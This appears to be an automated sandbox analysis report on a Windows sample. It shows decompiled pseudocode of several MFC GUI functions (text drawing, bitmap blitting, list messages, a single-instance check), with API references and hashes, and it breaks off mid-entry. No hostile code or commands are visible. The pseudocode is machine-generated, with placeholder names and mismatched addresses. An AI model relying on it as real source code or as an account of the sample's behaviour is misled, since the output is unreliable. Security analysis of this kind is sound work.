Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1641#562#816CapsCreateDeviceFontH_prologIndirectInfoParametersSystem
String ID: cbw
API String ID: 3558114968-4167342517
Opcode ID: be71a65285a98b57062bbf3db4b501cf1da44299973fac06d95fad537bafca1e
Instruction ID: 5f7759fb5e93635991df04c4953d0fec57a53cc45c803ccc676004ddadbccaa8
Opcode Fuzzy Hash: be71a65285a98b57062bbf3db4b501cf1da44299973fac06d95fad537bafca1e
Instruction Fuzzy Hash: F701A472A00624EBDB10EBA0FC4ABEDB734FB14305F5001AAE116A61E0DF781B48CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004020D1, Relevance: 13.6, APIs: 9, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E004020D1(void* __ecx) {
				int _t47;
				void* _t49;
				void* _t79;

				L004269E6();
				_t49 = __ecx;
				_push(__ecx);
				L00426558();
				_push(0xff0000);
				 *(_t79 - 4) = 0;
				L00425FC4();
				_push(0);
				_push(0xffffffff);
				_push(0);
				 *(_t79 - 0x24) = 0;
				 *(_t79 - 0x20) = 0;
				 *((intOrPtr*)(_t79 - 0x1c)) =  *((intOrPtr*)(__ecx + 0x48)) -  *((intOrPtr*)(__ecx + 0x40));
				 *((intOrPtr*)(_t79 - 0x18)) =  *((intOrPtr*)(__ecx + 0x4c)) -  *((intOrPtr*)(__ecx + 0x44));
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t79 - 4) = 1;
				_push(_t79 - 0x88);
				asm("movsd");
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x78)) + 4))();
				_push(0xc);
				L00426684();
				_push(1);
				L00425FBE();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t79 - 0x20) =  *((intOrPtr*)(_t79 - 0x18)) - DrawTextA( *(_t79 - 0x84),  *(__ecx + 0x74), 0xffffffff, _t79 - 0x34, 0x411) -  *(_t79 - 0x20) >> 1;
				_t47 = DrawTextA( *(_t79 - 0x84),  *(_t49 + 0x74), 0xffffffff, _t79 - 0x24, 0x11);
				 *((intOrPtr*)(_t79 - 0x14)) = 0x42c514;
				 *(_t79 - 4) = 2;
				L00425FA6();
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t79 - 0x14)) = 0x42c4fc;
				L00426552();
				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
				return _t47;
			}

0x0042115d
0x00421167
0x0042116a
0x00421171
0x00421178
0x00421180
0x00421183
0x00421194
0x00421195
0x00421197
0x00421198
0x0042119e
0x004211a6
0x004211a9
0x004211ac
0x004211b3
0x004211b4
0x004211bb
0x004211bf
0x004211c0
0x004211c1
0x004211c4
0x004211cc
0x004211d1
0x004211d9
0x004211e4
0x004211eb
0x004211ec
0x004211fc
0x00421221
0x00421224
0x00421226
0x00421230
0x00421234
0x00421239
0x00421243
0x0042124a
0x00421254
0x0042125d

APIs

_EH_prolog.MSVCRT ref: 0042115D
#470.MFC42 ref: 00421171
#283.MFC42(00FF0000), ref: 00421183
#5794.MFC42(0000000C), ref: 004211CC
#5875.MFC42(00000001,0000000C), ref: 004211D9
DrawTextA.USER32(?,?,000000FF,?,00000411), ref: 00421203
DrawTextA.USER32(?,?,000000FF,?,00000011), ref: 00421224
#2414.MFC42 ref: 00421234
#755.MFC42 ref: 0042124A

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText$#2414#283#470#5794#5875#755H_prolog
String ID:
API String ID: 3790522868-0
Opcode ID: 6456f99d507f85396830bbf01c92adb70ca233782d288cdaae34899b5f1cee7f
Instruction ID: 47827a279f890b374899f4d3314558ecc3c104cd67b593147fc009a7ce1150e3
Opcode Fuzzy Hash: 6456f99d507f85396830bbf01c92adb70ca233782d288cdaae34899b5f1cee7f
Instruction Fuzzy Hash: 643190719001299FCF04DFA8D985AEEBBB4FF08314F504289E915B7295DB746F44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040170D, Relevance: 13.6, APIs: 9, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040170D(intOrPtr* __ecx, void* __edx) {
				intOrPtr _t34;
				short _t35;
				signed int _t40;
				short _t42;
				intOrPtr _t54;
				intOrPtr* _t62;
				intOrPtr* _t64;
				short _t66;
				void* _t67;

				L004269E6();
				_t34 =  *((intOrPtr*)(_t67 + 0x10));
				_t64 = __ecx;
				if(_t34 == 0 ||  *((intOrPtr*)(_t67 + 0xc)) == 0) {
					L11:
					_t35 = 0;
				} else {
					_t62 =  *((intOrPtr*)(_t67 + 8));
					if(_t62 == 0) {
						goto L11;
					} else {
						_push(0);
						_push(0x14000c);
						_push(0);
						 *__ecx = _t34;
						L0042687C();
						 *(_t67 - 4) = 0;
						L00426876();
						if(_t34 != 0) {
							L004264B0();
							 *(_t67 - 4) = 1;
							_push( *((intOrPtr*)( *((intOrPtr*)(_t67 - 0x64)) + 0x10)));
							L004264AA();
							L00401429(__ecx, _t67 - 0x1c);
							_t40 = SendMessageA( *( *__ecx + 0x20), 0x1004, 0, 0);
							 *(_t64 + 0x38) = _t40;
							if(_t40 != 0) {
								asm("cdq");
								_push(_t62);
								 *((intOrPtr*)(_t62 + 0x14)) = 1;
								_t54 =  *((intOrPtr*)( *_t62 + 0x60));
								_t42 = _t40 /  *(_t64 + 0x34) + 1;
								 *((short*)(_t54 + 0x1e)) = _t42;
								 *(_t54 + 0x16) =  *(_t54 + 0x16) | 0x00000010;
								L00426870();
								_t66 = _t42;
							} else {
								_t66 = 0;
							}
							 *(_t67 - 4) = 0;
							L0042649E();
						} else {
							_t66 = 0;
						}
						 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
						L0042602A();
						_t35 = _t66;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t35;
			}

0x0041e9b2
0x0041e9bd
0x0041e9c7
0x0041e9c9
0x0041ea91
0x0041ea91
0x0041e9d8
0x0041e9d8
0x0041e9dd
0x00000000
0x0041e9e3
0x0041e9e3
0x0041e9e4
0x0041e9e9
0x0041e9f0
0x0041e9f2
0x0041e9fd
0x0041ea00
0x0041ea07
0x0041ea10
0x0041ea1b
0x0041ea1f
0x0041ea22
0x0041ea2d
0x0041ea3e
0x0041ea46
0x0041ea49
0x0041ea4f
0x0041ea55
0x0041ea56
0x0041ea5d
0x0041ea60
0x0041ea61
0x0041ea65
0x0041ea6c
0x0041ea71
0x0041ea4b
0x0041ea4b
0x0041ea4b
0x0041ea76
0x0041ea79
0x0041ea09
0x0041ea09
0x0041ea09
0x0041ea7e
0x0041ea88
0x0041ea8d
0x0041ea8d
0x0041e9dd
0x0041ea99
0x0041eaa1

APIs

_EH_prolog.MSVCRT ref: 0041E9B2
#482.MFC42(00000000,0014000C,00000000), ref: 0041E9F2
#3067.MFC42(00000000,0014000C,00000000), ref: 0041EA00
#323.MFC42(00000000,0014000C,00000000), ref: 0041EA10
#1640.MFC42(?,00000000,0014000C,00000000), ref: 0041EA22
SendMessageA.USER32 ref: 0041EA3E
#640.MFC42(?,?), ref: 0041EA79
#641.MFC42(?,?), ref: 0041EA88

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1640#3067#323#482#640#641H_prologMessageSend
String ID:
API String ID: 2027644727-0
Opcode ID: 3d7e7e66e0f7d0665f2bbe8a641610e8e0983da2dd13644a6b84d434ad25917d
Instruction ID: 56fb1f6c8eefaf8c873d1d7ab855da3aa7f4d8974a50854db4e3898295fd584a
Opcode Fuzzy Hash: 3d7e7e66e0f7d0665f2bbe8a641610e8e0983da2dd13644a6b84d434ad25917d
Instruction Fuzzy Hash: D6210975A01115DBCB10EFA2D980AEEF7B4FF14348F51406FE84197291DB38AD85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5E5, Relevance: 13.6, APIs: 9, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040B5E5(void* __ecx, void* __eflags) {
				void* _t38;
				void* _t39;
				void* _t42;
				void* _t62;
				void* _t64;

				L004269E6();
				 *((intOrPtr*)(_t62 - 0x10)) = _t64 - 0x130;
				 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
				 *(_t62 - 4) = 2;
				L00401A46(_t62 - 0x3c);
				_push(__ecx + 0x24);
				 *(_t62 - 4) = 3;
				L00426054();
				_push(": ");
				 *((intOrPtr*)(_t62 - 0x34)) =  *((intOrPtr*)(__ecx + 0x28));
				_push(_t62 + 8);
				_t38 = _t62 - 0x18;
				_push(_t38);
				L004261BC();
				 *(_t62 - 4) = 4;
				_push(_t62 + 0xc);
				_push(_t38);
				_t39 = _t62 - 0x14;
				_push(_t39);
				L004261B6();
				_push(_t39);
				 *(_t62 - 4) = 5;
				L00426054();
				 *(_t62 - 4) = 4;
				L00425DFC();
				 *(_t62 - 4) = 3;
				L00425DFC();
				_push(_t62 - 0x3c);
				 *((intOrPtr*)(_t62 - 0x2c)) = 7;
				L00401302(__ecx);
				 *(_t62 - 4) = 2;
				_t42 = L00401D48(_t62 - 0x3c);
				 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
				L00425DFC();
				 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t42;
			}

0x0040b5ea
0x0040b5fa
0x0040b5fd
0x0040b604
0x0040b608
0x0040b613
0x0040b614
0x0040b618
0x0040b620
0x0040b625
0x0040b62b
0x0040b62c
0x0040b62f
0x0040b630
0x0040b638
0x0040b63c
0x0040b63d
0x0040b63e
0x0040b641
0x0040b642
0x0040b647
0x0040b64b
0x0040b64f
0x0040b657
0x0040b65b
0x0040b663
0x0040b667
0x0040b671
0x0040b672
0x0040b679
0x0040b681
0x0040b685
0x0040b68a
0x0040b691
0x0040b696
0x0040b69d
0x0040b6a7
0x0040b6b0

APIs

_EH_prolog.MSVCRT ref: 0040B5EA
#858.MFC42(?), ref: 0040B618
#924.MFC42(?,?,00440608,?), ref: 0040B630
#922.MFC42(?,00000000,?,?,?,00440608,?), ref: 0040B642
#858.MFC42(00000000,?,00000000,?,?,?,00440608,?), ref: 0040B64F
#800.MFC42(00000000,?,00000000,?,?,?,00440608,?), ref: 0040B65B
#800.MFC42(00000000,?,00000000,?,?,?,00440608,?), ref: 0040B667
#800.MFC42(?,00000000,?,00000000,?,?,?,00440608,?), ref: 0040B691
#800.MFC42(?,00000000,?,00000000,?,?,?,00440608,?), ref: 0040B69D

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#858$#922#924H_prolog
String ID:
API String ID: 3341725904-0
Opcode ID: a7dde6a0b39c5ed1147e829dd70eba461532255be5b17cf9a85675e960668b6d
Instruction ID: 29590c680b60f95c54894bb472fe276d0f3e76abb3a8f5792579862a2f5a6341
Opcode Fuzzy Hash: a7dde6a0b39c5ed1147e829dd70eba461532255be5b17cf9a85675e960668b6d
Instruction Fuzzy Hash: C521BD71D01158EFDB05EBE5E54ABEEBBB8AF24308F50815EF405A3182DB786708CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402036, Relevance: 13.6, APIs: 9, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00402036(void* __eflags) {
				intOrPtr _t27;
				int _t32;
				intOrPtr _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t51;

				L004269E6();
				_t39 =  *((intOrPtr*)(_t42 + 0x1c));
				_push( *((intOrPtr*)(_t42 + 0x20)));
				_push(_t39);
				L00401221(_t51);
				L004264B0();
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_push(CreateCompatibleDC(0));
				L004264AA();
				if(_t39 != 0) {
					_t27 =  *((intOrPtr*)(_t39 + 4));
				} else {
					_t27 = 0;
				}
				_push(_t27);
				_push( *(_t42 - 0x18));
				L00426540();
				_t40 = _t27;
				asm("sbb eax, eax");
				_t32 = BitBlt( *( *((intOrPtr*)(_t42 + 8)) + 4),  *(_t42 + 0xc),  *(_t42 + 0x10),  *(_t42 + 0x14),  *(_t42 + 0x18),  ~(_t42 - 0x1c) &  *(_t42 - 0x18), 0, 0, 0xcc0020);
				if(_t40 != 0) {
					_t40 =  *((intOrPtr*)(_t40 + 4));
				}
				_push(_t40);
				_push( *(_t42 - 0x18));
				L00426540();
				L004264A4();
				 *(_t42 - 4) =  *(_t42 - 4) | 0xffffffff;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t32;
			}

0x00417c99
0x00417ca2
0x00417ca5
0x00417ca8
0x00417ca9
0x00417cb1
0x00417cb6
0x00417cc2
0x00417cc6
0x00417ccd
0x00417cd3
0x00417ccf
0x00417ccf
0x00417ccf
0x00417cd6
0x00417cd7
0x00417cda
0x00417cdf
0x00417ce6
0x00417d07
0x00417d0f
0x00417d11
0x00417d11
0x00417d14
0x00417d15
0x00417d18
0x00417d20
0x00417d25
0x00417d2c
0x00417d35
0x00417d3d

APIs

_EH_prolog.MSVCRT ref: 00417C99
#323.MFC42(?,?), ref: 00417CB1
CreateCompatibleDC.GDI32(00000000), ref: 00417CBC
#1640.MFC42(00000000), ref: 00417CC6
#5785.MFC42(00000000,00000000,00000000), ref: 00417CDA
BitBlt.GDI32(00000000,?,?,?,00000000,00000000,00000000,00000000,00CC0020), ref: 00417D07
#5785.MFC42(00000000,00000000), ref: 00417D18
#2405.MFC42(00000000,00000000), ref: 00417D20
#640.MFC42(00000000,00000000), ref: 00417D2C

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785$#1640#2405#323#640CompatibleCreateH_prolog
String ID:
API String ID: 519941721-0
Opcode ID: 18d717226c995c7a98ec1448670456091a38dea9363e44d81f86dbaaf9b13830
Instruction ID: 8bbc41a01e652bd3056d5dce278b074d46e3b2d9d71b522f364bba2a2b1df519
Opcode Fuzzy Hash: 18d717226c995c7a98ec1448670456091a38dea9363e44d81f86dbaaf9b13830
Instruction Fuzzy Hash: F9118E32A00129EBCF11EF90EC02FEF7B74EF14714F11851AF911A61A2D738A951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E19F, Relevance: 13.5, APIs: 9, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040E19F(intOrPtr __ecx) {
				void* _t34;

				L004269E6();
				_push(__ecx);
				 *((intOrPtr*)(_t34 - 0x10)) = __ecx;
				 *(_t34 - 4) = 6;
				L004263CC();
				 *(_t34 - 4) = 5;
				L004263CC();
				 *(_t34 - 4) = 4;
				L004263CC();
				 *(_t34 - 4) = 3;
				L004263CC();
				 *(_t34 - 4) = 2;
				L004263CC();
				 *(_t34 - 4) = 1;
				L004263CC();
				 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
				L004263CC();
				 *(_t34 - 4) =  *(_t34 - 4) | 0xffffffff;
				L0042602A();
				 *[fs:0x0] =  *((intOrPtr*)(_t34 - 0xc));
				return E00428B21;
			}

0x0040e1a4
0x0040e1a9
0x0040e1ad
0x0040e1b6
0x0040e1bd
0x0040e1c8
0x0040e1cc
0x0040e1d7
0x0040e1db
0x0040e1e6
0x0040e1ea
0x0040e1f5
0x0040e1f9
0x0040e204
0x0040e208
0x0040e20d
0x0040e214
0x0040e219
0x0040e21f
0x0040e228
0x0040e230

APIs

_EH_prolog.MSVCRT ref: 0040E1A4
#609.MFC42 ref: 0040E1BD
#609.MFC42 ref: 0040E1CC
#609.MFC42 ref: 0040E1DB
#609.MFC42 ref: 0040E1EA
#609.MFC42 ref: 0040E1F9
#609.MFC42 ref: 0040E208
#609.MFC42 ref: 0040E214
#641.MFC42 ref: 0040E21F

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #609$#641H_prolog
String ID:
API String ID: 4017314284-0
Opcode ID: 4a85dc29953cf11a30934211187502ded2d803dfc5fb7a842ffe546525190f25
Instruction ID: ee170eabb039e57bda6be525a15d9191eea479020e5cb6608ab4567baf00bf26
Opcode Fuzzy Hash: 4a85dc29953cf11a30934211187502ded2d803dfc5fb7a842ffe546525190f25
Instruction Fuzzy Hash: 9E01B130A017A5DAD715EBA5E0113DDBBA0AF19308F81448EE89613292CFB92B08C656

Uniqueness

Uniqueness Score: -1.00%

Function 00415224, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00415224(intOrPtr __ecx) {
				struct HDC__* _t27;
				intOrPtr _t28;
				void* _t33;
				intOrPtr _t36;
				intOrPtr _t39;
				intOrPtr* _t44;
				intOrPtr _t45;
				struct HDC__* _t47;
				void* _t50;
				void* _t53;

				L004269E6();
				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
				_t50 = L00401307();
				_t27 = GetDC( *(_t50 + 0x20));
				_push(_t27);
				L00425FD0();
				_t44 =  *((intOrPtr*)(_t53 + 0x1c));
				_t39 =  *0x440d0c; // 0xf
				_t47 = _t27;
				_t28 =  *0x440d08; // 0x10
				if(_t44 != 0) {
					_t36 =  *_t44;
					_t45 =  *((intOrPtr*)(_t44 + 4));
				} else {
					_t36 = _t28;
					_t45 = _t39;
				}
				 *(_t53 - 0x14) =  *(_t53 - 0x14) & 0x00000000;
				 *((intOrPtr*)(_t53 - 0x18)) = 0x42e34c;
				_t8 = _t53 + 0x18; // 0x42e34c
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				E00401780(_t45, _t47, _t53 - 0x18, _t36, _t45, _t28, _t39,  *((intOrPtr*)(_t53 + 0x10)),  *((intOrPtr*)(_t53 + 0x14)),  *_t8);
				ReleaseDC( *(_t50 + 0x20),  *(_t47 + 4));
				_push(_t53 - 0x18);
				_push( *((intOrPtr*)(_t53 + 0xc)));
				_push( *((intOrPtr*)(_t53 + 8)));
				_t33 = L00401CD5( *((intOrPtr*)(_t53 - 0x10)));
				 *((intOrPtr*)(_t53 - 0x18)) = 0x42c514;
				 *(_t53 - 4) = 1;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t33;
			}

0x00415229
0x00415234
0x0041523c
0x00415241
0x00415247
0x00415248
0x0041524d
0x00415250
0x00415256
0x00415258
0x0041525f
0x00415267
0x00415269
0x00415261
0x00415261
0x00415263
0x00415263
0x0041526c
0x00415270
0x00415277
0x0041527a
0x00415290
0x0041529b
0x004152a7
0x004152a8
0x004152ab
0x004152ae
0x004152b5
0x004152bf
0x004152c6
0x004152d3
0x004152db

APIs

_EH_prolog.MSVCRT ref: 00415229
GetDC.USER32(?), ref: 00415241
#2859.MFC42(00000000), ref: 00415248
ReleaseDC.USER32 ref: 0041529B
#2414.MFC42(?,?,0042E34C), ref: 004152C6

Strings

LB, xrefs: 00415270
LB, xrefs: 00415277

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#2859H_prologRelease
String ID: LB$LB
API String ID: 629481640-4028575280
Opcode ID: cee607380c68ba98a6eaebae186a6dd5c0ab91585a9cdd5785c49cb2be72b3f8
Instruction ID: 4c7252ae07c7c43de2499c44178c2170a3b2f08b20b7865d226cb0f498e161cd
Opcode Fuzzy Hash: cee607380c68ba98a6eaebae186a6dd5c0ab91585a9cdd5785c49cb2be72b3f8
Instruction Fuzzy Hash: A9219076A0011AEFDB01EF90D845EBFBBB5FF48308F10412AF905A3220D7349954DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401177, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401177(void* __ecx) {
				signed int _t28;
				void* _t30;

				L004269E6();
				 *(_t30 - 0x14) =  *(_t30 - 0x14) & 0x00000000;
				L00425E44();
				_push("CInstanceChecker_MMF_");
				L00425FB8();
				_t28 = 1;
				_push( *0x00429E17);
				 *(_t30 - 4) = _t28;
				L004263BA();
				_push(_t30 - 0x10);
				L0042611A();
				 *(_t30 - 0x14) = _t28;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return  *((intOrPtr*)(_t30 + 8));
			}

0x004204f0
0x004204f7
0x004204fd
0x00420505
0x0042050d
0x00420517
0x00420518
0x00420519
0x0042051c
0x00420527
0x00420528
0x0042052d
0x00420530
0x00420537
0x00420544
0x0042054c

APIs

_EH_prolog.MSVCRT ref: 004204F0
#1168.MFC42 ref: 004204FD
#537.MFC42(CInstanceChecker_MMF_), ref: 0042050D
#941.MFC42(?,CInstanceChecker_MMF_), ref: 0042051C
#535.MFC42(?,?,CInstanceChecker_MMF_), ref: 00420528
#800.MFC42(?,?,CInstanceChecker_MMF_), ref: 00420537

Strings

CInstanceChecker_MMF_, xrefs: 00420505

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#535#537#800#941H_prolog
String ID: CInstanceChecker_MMF_
API String ID: 245653172-146774202
Opcode ID: aaa0718c1c03cc9cf4a071a7cf5c62624e363ccac82913c361582fb7333b2c36
Instruction ID: 8e4051cf7ab0d0749c3b7cfa97545f7cec281e9dc4ac9cf9f97d19a9e6fe5229
